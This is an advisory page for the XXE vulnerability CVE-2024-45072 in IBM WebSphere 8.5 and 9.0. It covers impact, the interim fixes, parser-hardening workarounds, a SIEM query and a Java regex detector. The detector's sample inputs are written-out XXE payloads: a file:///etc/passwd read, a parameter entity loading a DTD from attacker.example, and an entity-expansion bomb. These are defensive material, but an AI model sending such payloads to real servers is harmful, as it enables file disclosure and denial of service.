CVE-2024-45072

5.5 MEDIUM

📋 TL;DR

IBM WebSphere Application Server 8.5 and 9.0 contains an XML External Entity (XXE) injection vulnerability in its XML processing. A privileged user who can submit XML data to the affected component can declare an external entity that points at a local file, disclosing any file readable by the server process account, or declare entities that expand until the JVM runs out of memory, causing a denial of service. Exploitation requires administrative or otherwise elevated privileges; an unauthenticated attacker cannot reach the vulnerable parsing path.

💻 Affected Systems

Products:
  • IBM WebSphere Application Server
Versions: 8.5 and 9.0
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires privileged user access to exploit. Affects XML processing components.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker holding (or having stolen) privileged credentials reads any file the WebSphere process account can read, including configuration files that hold credentials and keystore locations, and follows up with an entity-expansion payload that exhausts JVM memory and takes the server down.

🟠

Likely Case

A privileged user, or an attacker who has compromised a privileged account, submits a crafted XML document and reads internal files, exposing configuration data that can be used to move further into the environment.

🟢

If Mitigated

Limited impact: the privilege requirement keeps the bar high, and once the interim fix is applied (or DOCTYPE processing is refused at the boundary) the crafted entities are never resolved.

🌐 Internet-Facing: MEDIUM - Requires privileged user access but internet-facing systems have broader attack surface.
🏢 Internal Only: MEDIUM - Internal privileged users could exploit, but requires elevated permissions.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires privileged access and knowledge of which endpoint hands XML to the vulnerable parser. XXE payloads themselves are well documented and trivial to craft, so once the endpoint is known the remaining effort is small.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply Interim Fix PI99870 for 8.5 and PI99871 for 9.0

Vendor Advisory: https://www.ibm.com/support/pages/node/7173263

Restart Required: Yes

Instructions:

1. Download the appropriate interim fix from IBM Fix Central.
2. Stop WebSphere Application Server.
3. Apply the fix using IBM Installation Manager.
4. Restart WebSphere Application Server.
5. Verify that the fix is installed (see How to Verify below).

🔧 Temporary Workarounds

Disable XXE Processing

all

Configure any XML parser under your control to refuse DOCTYPE declarations and external entity resolution.

For JAXP parsers (DocumentBuilderFactory, SAXParserFactory, XMLInputFactory) set javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING to true and the Xerces feature http://apache.org/xml/features/disallow-doctype-decl to true; if a DTD must be accepted, set http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false instead. Caveat: this hardens parsers in your own applications and in any XML you can intercept before it reaches WebSphere; it does not alter the product component the IBM advisory describes, so it reduces exposure rather than removing the vulnerability.

Input Validation

all

Validate XML inputs at the boundary, but note that XML Schema validation on its own does not stop XXE: entity declarations in the DOCTYPE are processed before the document is validated against the schema. The effective check is to reject any inbound document that contains a DOCTYPE at all, and to limit document size so that an expansion payload cannot reach the parser.

🧯 If You Can't Patch

  • Reduce the number of accounts holding administrative or other privileged roles, and confine the endpoints that accept XML from those accounts (including the administrative console) to a management network.
  • Implement network segmentation and monitor for unusual XML payloads, in particular any request body carrying a DOCTYPE or ENTITY declaration.

🔍 How to Verify

Check if Vulnerable:

Check that the installed version is 8.5 or 9.0 and whether the interim fix named in the IBM advisory (PI99870 for 8.5, PI99871 for 9.0, per this page) appears in the list of installed maintenance packages.

Check Version:

$WAS_HOME/bin/versionInfo.sh (Linux) or versionInfo.bat (Windows); add -maintenancePackages to list the interim fixes installed in the profile.

Verify Fix Applied:

Confirm the interim fix shows as installed in IBM Installation Manager and in the versionInfo maintenance package list. Only on a non-production instance, submit an XML document containing a DOCTYPE with an external entity that references a harmless local file and confirm the entity is no longer resolved.

📡 Detection & Monitoring

Log Indicators:

  • XML parsing errors that mention DOCTYPE, entity or external identifier handling
  • File read attempts by the WebSphere process against paths unrelated to the installation (configuration, password or system files reached via XML entities)
  • JVM heap exhaustion warnings or OutOfMemoryError entries coinciding with XML requests

Network Indicators:

  • Large XML payloads with external entity references
  • Unusual requests to XML processing endpoints

SIEM Query:

source="websphere" AND (message="*XXE*" OR message="*external entity*" OR message="*DOCTYPE*")

Expect false positives on the DOCTYPE term from legitimate documents that carry a DTD; tune by correlating hits with the source account's privilege level and the target endpoint.
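The network indicators above are easier to act on if request bodies are screened before they reach the parser. As an added example (not from the page or from IBM), this Java class classifies XML payloads by the XXE-relevant constructs they contain and runs over a handful of constructed sample bodies; the thresholds and category names are assumptions chosen for illustration.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class XxePayloadDetector {

    // <!ENTITY name SYSTEM "..."> or PUBLIC "..." "...": the entity's
    // replacement text comes from a file or URL. Also matches parameter
    // entities (<!ENTITY % name SYSTEM ...).
    static final Pattern EXTERNAL_ENTITY = Pattern.compile(
        "<!ENTITY\\s+%?\\s*\\w+\\s+(SYSTEM|PUBLIC)\\s", Pattern.CASE_INSENSITIVE);
    // Parameter entities are the usual vehicle for out-of-band (blind) XXE.
    static final Pattern PARAMETER_ENTITY = Pattern.compile("<!ENTITY\\s+%", Pattern.CASE_INSENSITIVE);
    // Many internal entity declarations in one document suggest an
    // expansion (memory exhaustion) payload.
    static final Pattern ENTITY_DECL = Pattern.compile("<!ENTITY\\s", Pattern.CASE_INSENSITIVE);
    // Any DOCTYPE at all is unusual in application-to-application XML.
    static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE\\b", Pattern.CASE_INSENSITIVE);

    // Assumed threshold: five or more entity declarations is treated as
    // suspicious. Real traffic profiles should set this from a baseline.
    static final int EXPANSION_THRESHOLD = 5;

    // Returns the list of indicators found; empty means nothing to flag.
    static List<String> findings(String xml) {
        List<String> out = new ArrayList<>();
        if (EXTERNAL_ENTITY.matcher(xml).find()) out.add("external-entity");
        if (PARAMETER_ENTITY.matcher(xml).find()) out.add("parameter-entity");
        int declarations = count(ENTITY_DECL, xml);
        if (declarations >= EXPANSION_THRESHOLD) out.add("entity-expansion:" + declarations);
        // A DOCTYPE with an external subset (e.g. an XHTML DTD) is lower
        // severity but still fetched by a default parser, so report it.
        if (out.isEmpty() && DOCTYPE.matcher(xml).find()) out.add("doctype-only");
        return out;
    }

    static int count(Pattern p, String s) {
        Matcher m = p.matcher(s);
        int n = 0;
        while (m.find()) n++;
        return n;
    }

    public static void main(String[] args) {
        // Constructed sample request bodies, not captured traffic.
        String[] samples = {
            "<?xml version=\"1.0\"?><order><id>42</id></order>",
            "<!DOCTYPE x [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><x>&xxe;</x>",
            "<!DOCTYPE x [<!ENTITY % dtd SYSTEM \"http://attacker.example/evil.dtd\"> %dtd;]><x/>",
            "<!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol1 \"&lol;&lol;&lol;\">"
              + "<!ENTITY lol2 \"&lol1;&lol1;\"><!ENTITY lol3 \"&lol2;&lol2;\">"
              + "<!ENTITY lol4 \"&lol3;&lol3;\">]><lolz>&lol4;</lolz>",
            "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" "
              + "\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"><html/>",
        };
        for (String s : samples) {
            String preview = s.substring(0, Math.min(60, s.length()));
            System.out.println(findings(s) + "  <- " + preview);
        }
    }
}
```

The first sample produces no findings; the second reports external-entity; the third reports both external-entity and parameter-entity; the fourth reports entity-expansion:5; the XHTML sample reports doctype-only. A regex screen of this kind is a triage aid for logs and proxies, not a substitute for the interim fix, since encodings and entity tricks the regex does not anticipate will slip past it.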

🔗 References

📤 Share & Export